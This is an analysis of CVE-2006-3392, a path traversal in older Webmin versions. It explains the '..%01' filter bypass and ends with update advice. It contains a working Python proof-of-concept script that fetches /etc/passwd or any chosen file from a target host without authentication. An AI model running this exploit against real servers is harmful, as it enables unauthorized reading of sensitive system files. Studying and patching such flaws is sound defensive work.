Analysis of CVE-2006-3392: path traversal in Webmin
CVE-2006-3392[1] is a path traversal vulnerability[3] identified in Webmin[2], a web-based configuration system for Unix-like systems, affecting versions prior to 1.290. This vulnerability arises because the `simplify_path` function is invoked before HTML decoding. By crafting a sequence of bytes such as “..%01”, an attacker can bypass the removal of “../” sequences to the left of certain bytes (e.g., “%01”), enabling unauthenticated and unauthorized access to the contents of internal server files. The vulnerability was published by Kenny Chen on June 30, 2006.
This publication is also available in: Portuguese
Description
Webmin is a web-based configuration tool for Unix-like systems that allows the configuration of internal system resources, including users, disks, services, and file settings. Additionally, it also allows for the modification and control of open-source programs such as Apache HTTP Server, PHP, and MySQL, among others.
The vulnerability in question is a path traversal caused by the `simplify_path` function being executed before HTML decoding. By using a sequence of “..%01”, an attacker can bypass the removal of “../” sequences, enabling unauthenticated and unauthorized access to the contents of internal server files. This flaw allows unauthenticated attackers to read files from within the system through a URL containing a specially crafted payload.
The endpoint for the path traversal is located in the “/unauthenticated” directory. The payload can be constructed as follows:
Proof of Concept
#!/usr/bin/env python3
import requests
import argparse
import re
def exploit(url, file):
if not re.match(r'^https?://', url):
url \= f"https://{url}"
payload \= "/unauthenticated" \+ "/..%01" \* 20
try:
if file is None:
file \= "/etc/passwd"
response \= requests.get(url \+ payload \+ file)
print(response.text)
except requests.exceptions.RequestException as e:
print(f"Error making request for {url} \-\> {e.reason}")
def main():
parser \= argparse.ArgumentParser(description="CVE-2006-3392")
parser.add\_argument("-t", "--target", required=True)
parser.add\_argument("-f", "--file")
args \= parser.parse\_args()
try:
exploit(args.target, args.file)
except KeyboardInterrupt:
exit(1)
except EOFError:
exit(1)
if \_\_name\_\_ \== '\_\_main\_\_':
main()
Impact
The impact of this vulnerability is considered high-risk, as it allows an unauthenticated user to access sensitive information stored on the server. This access can provide in-depth knowledge of the system’s structure and configuration, facilitating a complete compromise of the system and its applications.
Conclusion
The vulnerability in Webmin, a web-based configuration interface for Unix-like systems, results from improper handling of “..” sequences. This issue arises because the `simplify_path` function is called before HTML decoding, enabling internal system files to be read through a path traversal attack.
The specific payload exploits this flaw by using the “..%01” sequence in the URL, granting access to sensitive files such as “/etc/passwd”. Therefore, it is crucial for system administrators to be aware of this vulnerability and take immediate action to update Webmin on legacy systems to mitigate risks and protect their servers.
References
- [1] MITRE - CVE-2006-3392
- [2] Webmin
- [3] OWASP - Path Traversal